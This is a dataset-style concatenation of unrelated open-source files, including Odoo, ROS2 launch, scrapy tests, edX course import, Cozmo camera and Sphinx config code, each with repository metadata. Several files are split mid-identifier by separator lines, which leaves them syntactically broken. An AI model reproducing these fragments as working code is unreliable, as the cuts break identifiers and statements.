# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from odoo import fields, models, api
from datetime import datetime
class OutletLoss(models.Model):
_name = 'outlet.loss'
@api.multi
@api.depends('qty', 'price_outlet', 'price_unit')
def _get_outlet_loss(self):
for loss in self:
loss.total_lost = loss.qty*(loss.price_outlet-loss.price_unit)
product_i
|
d = fields.Many2one('product.product', 'Product')
price_unit = fields.Float('Price')
price_outlet = fields.Float('Outlet Price')
total_lost = fields.Float("Outlet Loss", compute=_get_outlet_loss,
store=True, readonly=True)
date_move = fields.Date('Move to outlet on', default=fields.da
|
tetime.now())
outlet_ok = fields.Boolean('Outlet')
order_line_id = fields.Many2one('sale.order.line', 'Order Line')
qty = fields.Float('Quantity')
percent = fields.Float('Outlet Percent')
|
ros2/launch
|
launch/launch/conditions/launch_configuration_equals.py
|
Python
|
apache-2.0
| 2,600
| 0.001923
|
# Copyright 2020 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for LaunchConfigurationEquals class."""
from typing import Optional
from typing import Text
from ..condition import Condition
from ..launch_context import LaunchContext
from ..some_substitutions_type import SomeSubstitutionsType
from ..utilities import normalize_to_list_of_substitutions
from ..utilities import perform_substitutions
class LaunchConfigurationEquals(Condition):
"""
Condition on the value of a launch configuration.
This condition takes an optional string expression that is compared with the value of
a launch configuration.
If the value is equal to the launch configuration value, then this ``Condition``
evaluates to ``True``.
The expression may consist of :py:class:`launch.Substitution` instances.
If ``None`` is provided instead of a string expression, then the condition
evaluates to ``True`` if the launch configuration is not set.
"""
def __init__(
self,
launch_configuration_name: Text,
expected_value: Optional[SomeSubstitutionsType]
) -> None:
self.__launch_configuration_name = launch_configuration_name
if expected_value is not None:
self.__expected_value = normalize_to_list_of_subst
|
itutions(expected_value)
else:
self.__expected_value = None
super().__init__(predicate=self._predicate_func)
def _predicate_func(self, context: LaunchContext) -> bool:
expanded_expected_value = None
if self.__expected_value is not None:
expanded_expected_value = perform_substitutions(context, self.__expected_value)
try:
value = context.launch_configurati
|
ons[self.__launch_configuration_name]
return value == expanded_expected_value
except KeyError:
if expanded_expected_value is None:
return True
return False
def describe(self) -> Text:
"""Return a description of this Condition."""
return self.__repr__()
|
Connexions/cnx-publishing
|
cnxpublishing/views/moderation.py
|
Python
|
agpl-3.0
| 3,154
| 0
|
# -*- coding: utf-8 -*-
# ###
# Copyright (c) 2013-2016, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
from pyramid import httpexceptions
from pyramid.view import view_config
from ..db import poke_publication_state, db_connect
@view_config(route_name='moderation', request_method='GET',
accept="application/json",
renderer='json', permission='moderate', http_cache=0)
def get_moderation(request):
"""Return the list of publications that need moderation."""
with db_connect() as db_conn:
with db_conn.cursor() as cursor:
cursor.execute("""\
SELECT row_to_json(combined_rows) FROM (
SELECT id, created, publisher, publication_message,
(select array_agg(row_to_json(pd))
from pending_documents as pd
where pd.publication_id = p.id) AS models
FROM publications AS p
WHERE state = 'Waiting for moderation') AS combined_rows""")
moderations = [x[0] for x in cursor.fetchall()]
return moderations
@view_config(route_name='moderate', request_method='POST',
accept="application/json", permission='moderate', http_cache=0)
def post_moderation(request):
publication_id = request.matchdict['id']
posted = request.json
if 'is_accepted' not in posted \
or not isinstance(posted.get('is_accepted'), bool):
raise httpexceptions.HTTPBadRequest(
"Missing or invalid 'is_accepted' value.")
is_accepted = posted['is_accepted']
with db_connect() as db_conn:
with db_conn.cursor() as cursor:
if is_accepted:
# Give the publisher moderation approval.
cursor.execute("""\
UPDATE users SET (is_moderated) = ('t')
WHERE username = (SELECT publisher FROM publications
WHERE id = %s and state = 'Waiting for moderation')""",
(publication_id,))
# Poke the publication into a state change.
poke_publication_state(publication_id, cursor)
else:
# Reject! And Vacuum properties of the publication
# record to /dev/null.
cursor.execute("""\
UPDATE users SET (is_moderated) = ('f')
WHERE username = (SELECT publisher FROM publications
WHERE id = %sand state = 'Waiting for moderation')""",
(publication_id,))
cursor.execute("""\
UPDATE publications SET (epub, state) = (null, 'Rejected')
WHERE id = %s""", (publication_id,))
return httpexceptions.HTTPAccepted()
@view_config(route_name='admin-moderation', request_method='GET',
renderer="cnxpublishing.views:templates/moderations.html",
permission='moderate', http_cache=0)
@view_config(route_name='moderation-rss', request_method='
|
GET',
renderer="cnxpublishing.views:templates/moderations.rss",
permission='view', http_cache=0)
def admin_moderations(request): # pragma: no cover
|
return {'moderations': get_moderation(request)}
|
ofanoyi/scrapy
|
scrapy/tests/test_utils_python.py
|
Python
|
bsd-3-clause
| 6,570
| 0.001218
|
import functools
import operator
import unittest
from itertools import count
from scrapy.utils.python import str_to_unicode, unicode_to_str, \
memoizemethod_noargs, isbinarytext, equal_attributes, \
WeakKeyCache, stringify_dict, get_func_args
__doctests__ = ['scrapy.utils.python']
class UtilsPythonTestCase(unittest.TestCase):
def test_str_to_unicode(self):
# converting an utf-8 encoded string to unicode
self.assertEqual(str_to_unicode('lel\xc3\xb1e'), u'lel\xf1e')
# converting a latin-1 encoded string to unicode
self.assertEqual(str_to_unicode('lel\xf1e', 'latin-1'), u'lel\xf1e')
# converting a unicode to unicode should return the same object
self.assertEqual(str_to_unicode(u'\xf1e\xf1e\xf1e'), u'\xf1e\xf1e\xf1e')
# converting a strange object should raise TypeError
self.assertRaises(TypeError, str_to_unicode, 423)
# check errors argument works
assert u'\ufffd' in str_to_unicode('a\xedb', 'utf-8', errors='replace')
def test_unicode_to_str(self):
# converting a unicode object to an utf-8 encoded string
self.assertEqual(unicode_to_str(u'\xa3 49'), '\xc2\xa3 49')
# converting a unicode object to a latin-1 encoded string
self.assertEqual(unicode_to_str(u'\xa3 49', 'latin-1'), '\xa3 49')
# converting a regular string to string should return the same object
self.assertEqual(unicode_to_str('lel\xf1e'), 'lel\xf1e')
# converting a strange object should raise TypeError
self.assertRaises(TypeError, unicode_to_str, unittest)
# check errors argument works
assert '?' in unicode_to_str(u'a\ufffdb', 'latin-1', errors='replace')
def test_memoizemethod_noargs(self):
class A(object):
@memoizemethod_noargs
def cached(self):
return object()
def noncached(self):
return object()
a = A()
one = a.cached()
two = a.cached()
three = a.noncached()
assert one is two
assert one is not three
def test_isbinarytext(self):
# basic tests
assert not isbinarytext("hello")
# utf-16 strings contain null bytes
assert not isbinarytext(u"hello".encode('utf-16'))
# one with encoding
assert not isbinarytext("<div>Price \xa3</div>")
# finally some real binary bytes
assert isbinarytext("\x02\xa3")
def test_equal_attributes(self):
class Obj:
pass
a = Obj()
b = Obj()
# no attributes given return False
self.failIf(equal_attributes(a, b, []))
# not existent attributes
self.failIf(equal_attributes(a, b, ['x', 'y']))
a.x = 1
b.x = 1
# equal attribute
self.failUnless(equal_attributes(a, b, ['x']))
b.y = 2
# obj1 has no attribute y
self.failIf(equal_attributes(a, b, ['x',
|
'y']))
a.y = 2
# equal attributes
self.failUnless(equal_attributes(a, b, ['x', 'y']))
a.y = 1
# differente attributes
self.failIf(equal_attributes(a, b, ['x', 'y']))
# test callable
a.meta = {}
b.meta = {}
se
|
lf.failUnless(equal_attributes(a, b, ['meta']))
# compare ['meta']['a']
a.meta['z'] = 1
b.meta['z'] = 1
get_z = operator.itemgetter('z')
get_meta = operator.attrgetter('meta')
compare_z = lambda obj: get_z(get_meta(obj))
self.failUnless(equal_attributes(a, b, [compare_z, 'x']))
# fail z equality
a.meta['z'] = 2
self.failIf(equal_attributes(a, b, [compare_z, 'x']))
def test_weakkeycache(self):
class _Weakme(object): pass
_values = count()
wk = WeakKeyCache(lambda k: next(_values))
k = _Weakme()
v = wk[k]
self.assertEqual(v, wk[k])
self.assertNotEqual(v, wk[_Weakme()])
self.assertEqual(v, wk[k])
del k
self.assertFalse(len(wk._weakdict))
def test_stringify_dict(self):
d = {'a': 123, u'b': 'c', u'd': u'e', object(): u'e'}
d2 = stringify_dict(d, keys_only=False)
self.failUnlessEqual(d, d2)
self.failIf(d is d2) # shouldn't modify in place
self.failIf(any(isinstance(x, unicode) for x in d2.keys()))
self.failIf(any(isinstance(x, unicode) for x in d2.values()))
def test_stringify_dict_tuples(self):
tuples = [('a', 123), (u'b', 'c'), (u'd', u'e'), (object(), u'e')]
d = dict(tuples)
d2 = stringify_dict(tuples, keys_only=False)
self.failUnlessEqual(d, d2)
self.failIf(d is d2) # shouldn't modify in place
self.failIf(any(isinstance(x, unicode) for x in d2.keys()), d2.keys())
self.failIf(any(isinstance(x, unicode) for x in d2.values()))
def test_stringify_dict_keys_only(self):
d = {'a': 123, u'b': 'c', u'd': u'e', object(): u'e'}
d2 = stringify_dict(d)
self.failUnlessEqual(d, d2)
self.failIf(d is d2) # shouldn't modify in place
self.failIf(any(isinstance(x, unicode) for x in d2.keys()))
def test_get_func_args(self):
def f1(a, b, c):
pass
def f2(a, b=None, c=None):
pass
class A(object):
def __init__(self, a, b, c):
pass
def method(self, a, b, c):
pass
class Callable(object):
def __call__(self, a, b, c):
pass
a = A(1, 2, 3)
cal = Callable()
partial_f1 = functools.partial(f1, None)
partial_f2 = functools.partial(f1, b=None)
partial_f3 = functools.partial(partial_f2, None)
self.assertEqual(get_func_args(f1), ['a', 'b', 'c'])
self.assertEqual(get_func_args(f2), ['a', 'b', 'c'])
self.assertEqual(get_func_args(A), ['a', 'b', 'c'])
self.assertEqual(get_func_args(a.method), ['a', 'b', 'c'])
self.assertEqual(get_func_args(partial_f1), ['b', 'c'])
self.assertEqual(get_func_args(partial_f2), ['a', 'c'])
self.assertEqual(get_func_args(partial_f3), ['c'])
self.assertEqual(get_func_args(cal), ['a', 'b', 'c'])
self.assertEqual(get_func_args(object), [])
# TODO: how do we fix this to return the actual argument names?
self.assertEqual(get_func_args(unicode.split), [])
self.assertEqual(get_func_args(" ".join), [])
if __name__ == "__main__":
unittest.main()
|
mcmartins/chaosproxy
|
setup.py
|
Python
|
mit
| 564
| 0.001773
|
from setuptools import setup
from chaosproxy.chaosproxy import __version__
setup(
name='ChaosProxy',
version=__version__,
description='ChaosProxy is an http 1.0 proxy / forward server that creates unstable connections.',
url='http://github.com/mcmartins/chaosproxy',
|
author='Manuel Martins',
author_email='manuelmachadomartins@gmail.com',
license='MIT',
packages=['chaosproxy'],
package_
|
data={'chaosproxy': ['sample-conf.json']},
requires=['argparse'],
install_requires=[
'argparse'
],
zip_safe=False
)
|
BackupTheBerlios/espressopp
|
src/esutil/NormalVariate.py
|
Python
|
gpl-3.0
| 1,470
| 0.009524
|
# Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License
|
as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICUL
|
AR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
*********************************
**espresso.esutil.NormalVariate**
*********************************
"""
from espresso import pmi
from _espresso import esutil_NormalVariate
class NormalVariateLocal(esutil_NormalVariate):
def __init__(self, mean=0.0, sigma=1.0):
cxxinit(self, esutil_NormalVariate, mean, sigma)
if pmi.isController:
class NormalVariate(object):
__metaclass__ = pmi.Proxy
"""A random normal variate."""
pmiproxydefs = dict(
cls = 'espresso.esutil.NormalVariateLocal',
localcall = [ '__call__' ],
)
|
UQ-UQx/edx-platform_lti
|
common/lib/xmodule/xmodule/modulestore/xml_importer.py
|
Python
|
agpl-3.0
| 40,861
| 0.002007
|
"""
Each store has slightly different semantics wrt draft v published. XML doesn't officially recognize draft
but does hold it in a subdir. Old mongo has a virtual but not physical draft for every unit in published state.
Split mongo has a physical for every unit in every state.
Given that, here's a table of semantics and behaviors where - means no record and letters indicate values.
For xml, (-, x) means the item is published and can be edited. For split, it means the item's
been deleted from draft and will be deleted from published the next time it gets published. old mongo
can't represent that virtual state (2nd row in table)
In the table body, the tuples represent virtual modulestore result. The row headers represent the pre-import
modulestore state.
Modulestore virtual | XML physical (draft, published)
(draft, published) | (-, -) | (x, -) | (x, x) | (x, y) | (-, x)
----------------------+--------------------------------------------
(-, -) | (-, -) | (x, -) | (x, x) | (x, y) | (-, x)
(-, a) | (-, a) | (x, a) | (x, x) | (x, y) | (-, x) : deleted from draft before import
(a, -) | (a, -) | (x, -) | (x, x) | (x, y) | (a, x)
(a, a) | (a, a) | (x, a) | (x, x) | (x, y) | (a, x)
(a, b) | (a, b) | (x, b) | (x, x) | (x, y) | (a, x)
"""
import logging
import os
import mimetypes
from path import path
import json
import re
from lxml import etree
from .xml import XMLModuleStore, ImportSystem, ParentTracker
from xblock.runtime import KvsFieldData, DictKeyValueStore
from xmodule.x_module import XModuleDescriptor
from opaque_keys.edx.keys import UsageKey
from xblock.fields import Scope, Reference, ReferenceList, ReferenceValueDict
from xmodule.contentstore.content import StaticContent
from .inheritance import own_metadata
from xmodule.errortracker import make_error_tracker
from .store_utilities import rewrite_nonportable_content_links
import xblock
from xmodule.tabs import CourseTabList
from xmodule.assetstore import AssetMetadata
from xmodule.modulestore.django import ASSET_IGNORE_REGEX
from xmodule.modulestore.exceptions import DuplicateCourseError
from xmodule.modulestore.mongo.base import MongoRevisionKey
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.store_utilities import draft_node_constructor, get_draft_subtree_roots
log = logging.getLogger(__name__)
def import_static_content(
course_data_path, static_content_store,
target_course_id, subpath='static', verbose=False):
remap_dict = {}
# now import all static assets
static_dir = course_data_path / subpath
try:
with open(course_data_path / 'policies/assets.json') as f:
policy = json.load(f)
except (IOError, ValueError) as err:
# xml backed courses won't have this file, only exported courses;
# so, its absence is not really an exception.
policy = {}
verbose = True
mimetypes.add_type('application/octet-stream', '.sjson')
mimetypes.add_type('application/octet-stream', '.srt')
mimetypes_list = mimetypes.types_map.values()
for dirname, _, filenames in os.walk(static_dir):
for filename in filenames:
content_path = os.path.join(dirname, filename)
if re.match(ASSET_IGNORE_REGEX, filename):
if verbose:
log.debug('skipping static content %s...', content_path)
continue
if verbose:
log.debug('importing static content %s...', content_path)
try:
with open(content_path, 'rb') as f:
data = f.read()
except IOError:
if filename.startswith('._'):
# OS X "companion files". See
# http://www.diigo.com/annotated/0c936fda5da4aa1159c189cea227e174
continue
# Not a 'hidden file', then re-raise exception
raise
# strip away leading path from the name
fullname_with_subpath = content_path.replace(static_dir, '')
if fullname_with_subpath.startswith('/'):
fullname_with_subpath = fullname_with_subpath[1:]
asset_key = StaticContent.compute_location(target_course_id, fullname_with_subpath)
policy_ele = policy.get(asset_key.path, {})
displayname = policy_ele.get('displayname', filename)
locked = policy_ele.get('locked', False)
mime_type = policy_ele.get('contentType')
# Check extracted contentType in list of all valid mimetypes
if not mime_type or mime_type not in mimetypes_list:
mime_type = mimetypes.guess_type(filename)[0] # Assign guessed mimetype
content = StaticContent(
asset_key, displayname, mime_type, data,
import_path=fullname_with_subpath, locked=locked
)
# first let's save a thumbnail so we can get back a thumbnail location
thumbnail_content, thumbnail_location = static_content_store.generate_thumbnail(content)
if thumbnail_content is not None:
content.thumbnail_location = thumbnail_location
# then commit the content
try:
static_content_store.save(content)
except Exception as err:
log.exception(u'Error importing {0}, error={1}'.format(
fullname_with_subpath, err
))
# store the remapping information which will be needed
# to subsitute in the module data
remap_dict[fullname_with_subpath] = asset_key
return remap_dict
def import_from_xml(
store, user_id, data_dir, course_dirs=None,
default_class='xmodule.raw_module.RawDescriptor',
load_error_modules=True, static_content_store=None,
target_course_id=None, verbose=False,
do_import_static=True, create_course_if_not_present=False,
raise_on_failure=False):
"""
Import xml-based courses from data_dir into modulestore.
Returns:
list of new course objects
Args:
store: a modulestore implementing ModuleStoreWriteBase in which to store the imported courses.
data_dir: the root directory from which to find the xml courses.
course_dirs: If specified, the list of data_dir subdirectories to load. Otherwise, load
all course dirs
target_course_id: is the CourseKey that all modules should be remapped to
after import off disk. NOTE: this only makes sense if importing only
one course. If there ar
|
e more than one course loaded from data_dir/course_dirs & you
supply this id, this method will raise an AssertException.
static_content_store: the static asset store
do_import
|
_static: if True, then import the course's static files into static_content_store
This can be employed for courses which have substantial
unchanging static content, which is too inefficient to import every
time the course is loaded. Static content for some courses may also be
served directly by nginx, instead of going through django.
create_course_if_not_present: If True, then a new course is created if it doesn't already exist.
Otherwise, it throws an InvalidLocationError if the course does not exist.
default_class, load_error_modules: are arguments for constructing the XMLModuleStore (see its doc)
"""
xml_module_store = XMLModuleStore(
data_dir,
default_class=default_class,
course_dirs=course_dirs,
load_error_modules=load_error_modules,
xblock_mixins=store.xblock_mixins,
xblock_select=store.xblock_select,
)
# If we're going to remap the course_id, then we can only do that with
# a single course
if target_course_id:
assert(len(xml_module_store.modules) == 1)
new_courses = []
for course_key in xml_module_store.modules.keys():
if target_course_id is not None:
|
drufat/dec
|
doc/plot/cheb/basis_forms.py
|
Python
|
gpl-3.0
| 1,067
| 0.008435
|
from dec.grid1 import *
import matplotlib.pyplot as plt
N = 4
#g = Gri
|
d_1D.periodic(N)
g = Grid_1D.regular(N)
#g = Grid_1D.chebyshev(N)
z = linspace(g.xmin, g.xmax, 100) #+ 1e-16
B0, B1, B0d, B1d = g.basis_fn()
H0, H1, H0d, H1d = hodge_star_matrix(g.projection(), g.basis_fn())
H1d = linalg.inv(H0)
#polynomial fit
#def poly_coeff(basis):
# A = array([polyfit(z, b(z), len(basis)-1)[::-1] for i, b in enumerate(basis)])
# return A
#print poly_coeff(g.
|
B0)
#print poly_coeff(g.B1d)
plt.figure()
A = linalg.inv(H0).T
U = array([b(z) for b in B1d])
V = dot(A, array([b(z) for b in B0]))
for u, v in zip(U, V):
plt.plot(z, u)
plt.plot(z, v, color='k')
plt.scatter(g.verts, 0*g.verts)
plt.scatter(g.verts_dual, 0*g.verts_dual, color='r', marker='x')
plt.figure()
A = linalg.inv(H1).T
U = array([b(z) for b in B0d])
V = dot(A, array([b(z) for b in B1]))
for u, v in zip(U, V):
plt.plot(z, u)
plt.plot(z, v, color='k')
plt.scatter(g.verts, 0*g.verts)
plt.scatter(g.verts_dual, 0*g.verts_dual, color='r', marker='x')
plt.show()
|
thumbor-community/shortener
|
docs/conf.py
|
Python
|
mit
| 8,491
| 0.005889
|
# -*- coding: utf-8 -*-
#
# Thumbor documentation build configuration file, created by
# sphinx-quickstart on Mon Sep 1 13:18:38 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, thumbor.__path__)
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Thumbor Community Shortener Extension'
copyright = u'Thumbor Community'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = thumbor.__version__
# The full version, including alpha/beta/rc tags.
# release = thumbor.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'default'
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Thumborcommdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble'
|
: '',
}
# Grouping the document tree into LaTeX files. List
|
of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
# latex_documents = [
# ('index', 'Thumbor.tex', u'Thumbor Documentation',
# u'Bernardo Heynemann', 'manual'),
# ]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
# man_pages = [
# ('index', 'thumbor', u'Thumbor Documentation',
# [u'Bernardo Heynemann'], 1)
# ]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Thumbor Community', u'Thumbor Community Documentation',
u'@masom', 'Thumbor Community', 'Thumbor Community Extensions',
'Miscellaneous'),
]
# Documents to append as an appendix
|
ssut/PushBank
|
pushbank/_singleton.py
|
Python
|
mit
| 330
| 0
|
class _Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
|
cls._instances[cls] = super(_Singleton, cls).__call__(
*args, **kwargs)
return cls._instances[cls]
class Singleton(_Singleton('SingletonMeta', (obj
|
ect,), {})):
pass
|
manxueitp/cozmo-test
|
object_recognition/04_exposure.py
|
Python
|
mit
| 4,967
| 0.001812
|
#!/usr/bin/env python3
# Copyright (c) 2017 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Demonstrate the manual and auto exposure settings of Cozmo's camera.
This example demonstrates the use of auto exposure and manual exposure for
Cozmo's camera. The current camera settings are overlayed onto the camera
viewer window.
'''
import sys
import time
try:
from PIL import ImageDraw, ImageFont
import numpy as np
except ImportError:
sys.exit('run `pip3 install --user Pillow numpy` to run this example')
import cozmo
# A global string value to display in the camera viewer window to make it more
# obvious what the example program is currently doing.
example_mode = ""
# An annotator for live-display of all of the camera info on top of the camera
# viewer window.
@cozmo.annotate.annotator
def camera_info(image, scale, annotator=None, world=None, **kw):
d = ImageDraw.Draw(image)
bounds = [3, 0, image.width, image.height]
camera = world.robot.camera
text_to_display = "Example Mode: " + example_mode + "\n\n"
text_to_display += "Fixed Camera Settings (Calibrated for this Robot):\n\n"
text_to_display += 'focal_length: %s\n' % camera.config.focal_length
text_to_display += 'center: %s\n' % camera.config.center
text_to_display += 'fov: <%.3f, %.3f> degrees\n' % (camera.config.fov_x.degrees,
camera.config.fov_y.degrees)
text_to_display += "\n"
text_to_display += "Valid exposure and gain ranges:\n\n"
text_to_display += 'exposure: %s..%s\n' % (camera.config.min_exposure_time_ms,
camera.config.max_exposure_time_ms)
text_to_display += 'gain: %.3f..%.3f\n' % (camera.config.min_gain,
camera.config.max_gain)
text_to_display += "\n"
text_to_display += "Current settings:\n\n"
text_to_display += 'Auto Exposure Enabled: %s\n' % camera.is_auto_exposure_enabled
text_to_display += 'Exposure: %s ms\n' % camera.exposure_ms
text_to_display += 'Gain: %.3f\n' % camera.gain
color_mode_str = "Color" if camera.color_image_enabled else "Grayscale"
text_to_display += 'Color Mode: %s\n' % color_mode_str
text = cozmo.annotate.ImageText(text_to_display,
position=cozmo.annotate.TOP_LEFT,
line_spacing=2,
color="white",
outline_color="black", full_outline=True)
text.render(d, bounds)
def demo_camera_exposure(robot: cozmo.robot.Robot):
global example_mode
# Ensure camera is in auto exposure mode and demonstrate auto exposure for 5 seconds
camera = robot.camera
camera.enable_auto_exposure()
example_mode = "Auto Exposure"
time.sleep(5)
# Demonstrate manual exposure, linearly increasing the exposure time, while
# keeping the gain fixed at a medium value.
example_mode = "Manual Exposure - Increasing Exposure, Fixed Gain"
fixed_gain = (camera.config.min_gain + camera.config.max_gain) * 0.5
for exposure in range(camera.config.min_exposure_time_ms, camera.config.max_exposure_time_ms+1, 1):
camera.set_manual_exposure(exposure, fixed_gain)
time.sleep(0.1)
# Demonstrate manual exposure, linearly increasing the gain, while keeping
# the exposure fixed at a relatively low value.
example_mode = "Manual Exposure - Increasing Gain, Fixed Exposure"
fixed_exposure_ms = 10
for gain in np.arange(camera.config.min_gain, camera.config.max_gain, 0.05):
camera.set_manual_exposure(fixed_exposure_ms, gain)
time.sleep(0.1)
# Switch back to auto exposure, demo for a final 5 seconds and then return
camera.enable_auto_exposure()
example_mode = "Mode: Auto Exposure"
time.sleep(5)
def cozmo_program(robot: cozmo.robot.Robot):
robot.world.image_annotator.add_annotator('camera_info', camera_info)
|
# Demo with default grayscale camera images
robot.camera.color_image_enabled = False
demo_camera_exposure(robot)
# Demo with color camera images
robot.camera.color_image_enabled = True
demo_camera_exposure(robot)
cozmo.robot.Robot.drive_off_charger_on_connect = False # Cozmo can stay on his charger for this example
cozmo.run_program(cozmo_program, us
|
e_viewer=True, force_viewer_on_top=True)
|
enricoba/eems-box
|
configbus.py
|
Python
|
mit
| 2,756
| 0.003266
|
class __ConfigBus(object):
def __init__(self):
"""Private object *_ConfigBus* provides private functions for various config classes.
"""
self.conf = 'eems.conf'
def _read(self):
"""Private function *_read* reads the eems.conf file and returns all lines.
:return: *list*
"""
with open(self.conf, 'r') as conf:
return conf.readlines()
def _write(self, content):
"""Private function *_write* writes the param content to the eems.conf file.
:param content: *string*
:return: *None*
"""
with open(self.conf, 'w') as conf:
conf.write(content)
class _Interval(__ConfigBus):
